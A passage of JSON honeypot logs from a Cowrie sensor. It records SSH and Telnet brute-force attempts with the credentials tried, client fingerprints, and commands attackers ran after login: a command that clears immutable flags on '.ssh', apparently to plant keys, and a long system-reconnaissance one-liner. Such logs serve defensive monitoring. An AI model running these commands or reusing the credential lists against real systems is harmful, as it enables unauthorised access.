03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:55:55.586439Z","src_ip":"212.227.235.229","session":"569032a4b16a"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe123","message":"login attempt [felipe/felipe123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:55:56.337351Z","src_ip":"80.94.95.15","session":"907030ee7607"}
{"eventid":"cowrie.login.success","username":"root","password":"Zy123456","message":"login attempt [root/Zy123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:55:56.546208Z","src_ip":"212.227.235.229","session":"569032a4b16a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:55:57.057163Z","src_ip":"212.227.235.229","session":"569032a4b16a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:55:57.057923Z","src_ip":"212.227.235.229","session":"569032a4b16a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:55:57.058748Z","src_ip":"212.227.235.229","session":"569032a4b16a"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe1234","message":"login attempt [felipe/felipe1234] failed","sensor":"my-vps","timestamp":"2025-08-26T20:55:57.427107Z","src_ip":"80.94.95.15","session":"907030ee7607"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe12345","message":"login attempt [felipe/felipe12345] failed","sensor":"my-vps","timestamp":"2025-08-26T20:55:58.522355Z","src_ip":"80.94.95.15","session":"907030ee7607"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:55:59.610055Z","src_ip":"80.94.95.15","session":"907030ee7607"}
{"eventid":"cowrie.session.closed","duration":"301.3","message":"Connection lost after 301.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:57:38.647414Z","src_ip":"212.227.235.229","session":"dd71463da862"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35875,"dst_ip":"1.2.3.4","dst_port":23,"session":"ae72f6085d9f","protocol":"telnet","message":"New connection: 212.227.125.160:35875 (1.2.3.4:23) [session: ae72f6085d9f]","sensor":"my-vps","timestamp":"2025-08-26T20:57:52.704893Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37380,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ba7a34ec0dc","protocol":"ssh","message":"New connection: 212.227.235.229:37380 (1.2.3.4:22) [session: 6ba7a34ec0dc]","sensor":"my-vps","timestamp":"2025-08-26T20:58:11.517738Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:58:12.218592Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:58:12.219379Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.login.success","username":"root","password":"4321","message":"login attempt [root/4321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:58:15.970062Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:58:18.490423Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.491297Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.492006Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.492964Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.494165Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.494826Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.496360Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.497461Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.498038Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.498564Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.499010Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.499945Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:58:18.500623Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:58:20.014192Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:58:20.015184Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:58:20.016431Z","src_ip":"212.227.235.229","session":"6ba7a34ec0dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56876,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b9628894b54","protocol":"ssh","message":"New connection: 212.227.235.229:56876 (1.2.3.4:22) [session: 0b9628894b54]","sensor":"my-vps","timestamp":"2025-08-26T20:58:20.386070Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:58:20.387159Z","src_ip":"212.227.235.229","session":"0b9628894b54"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:58:20.638801Z","src_ip":"212.227.235.229","session":"0b9628894b54"}
{"eventid":"cowrie.login.success","username":"root","password":"Hz123456","message":"login attempt [root/Hz123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:58:21.661546Z","src_ip":"212.227.235.229","session":"0b9628894b54"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:58:22.177531Z","src_ip":"212.227.235.229","session":"0b9628894b54"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:58:22.178308Z","src_ip":"212.227.235.229","session":"0b9628894b54"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:58:22.179150Z","src_ip":"212.227.235.229","session":"0b9628894b54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41920,"dst_ip":"1.2.3.4","dst_port":22,"session":"58faabc4a811","protocol":"ssh","message":"New connection: 212.227.235.229:41920 (1.2.3.4:22) [session: 58faabc4a811]","sensor":"my-vps","timestamp":"2025-08-26T20:58:22.216364Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:58:22.230046Z","src_ip":"212.227.235.229","session":"58faabc4a811"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:58:22.424413Z","src_ip":"212.227.235.229","session":"0b9628894b54"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:58:22.473268Z","src_ip":"212.227.235.229","session":"58faabc4a811"}
{"eventid":"cowrie.login.failed","username":"config","password":"config","message":"login attempt [config/config] failed","sensor":"my-vps","timestamp":"2025-08-26T20:58:23.732508Z","src_ip":"212.227.235.229","session":"58faabc4a811"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:58:25.613940Z","src_ip":"212.227.235.229","session":"58faabc4a811"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44636,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c5979b8f079","protocol":"ssh","message":"New connection: 212.227.235.229:44636 (1.2.3.4:22) [session: 2c5979b8f079]","sensor":"my-vps","timestamp":"2025-08-26T20:58:29.963614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:58:30.031637Z","src_ip":"212.227.235.229","session":"2c5979b8f079"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T20:58:30.255607Z","src_ip":"212.227.235.229","session":"2c5979b8f079"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T20:58:32.741257Z","src_ip":"212.227.235.229","session":"2c5979b8f079"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:58:34.015944Z","src_ip":"212.227.235.229","session":"2c5979b8f079"}
{"eventid":"cowrie.session.closed","duration":46.717116355895996,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:58:39.421932Z","src_ip":"212.227.125.160","session":"ae72f6085d9f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59032,"dst_ip":"1.2.3.4","dst_port":22,"session":"059c6386a55f","protocol":"ssh","message":"New connection: 212.227.235.229:59032 (1.2.3.4:22) [session: 059c6386a55f]","sensor":"my-vps","timestamp":"2025-08-26T20:58:50.652677Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:58:50.653682Z","src_ip":"212.227.235.229","session":"059c6386a55f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59056,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b15490fe8c0","protocol":"ssh","message":"New connection: 212.227.235.229:59056 (1.2.3.4:22) [session: 4b15490fe8c0]","sensor":"my-vps","timestamp":"2025-08-26T20:58:56.130947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T20:58:56.131885Z","src_ip":"212.227.235.229","session":"4b15490fe8c0"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@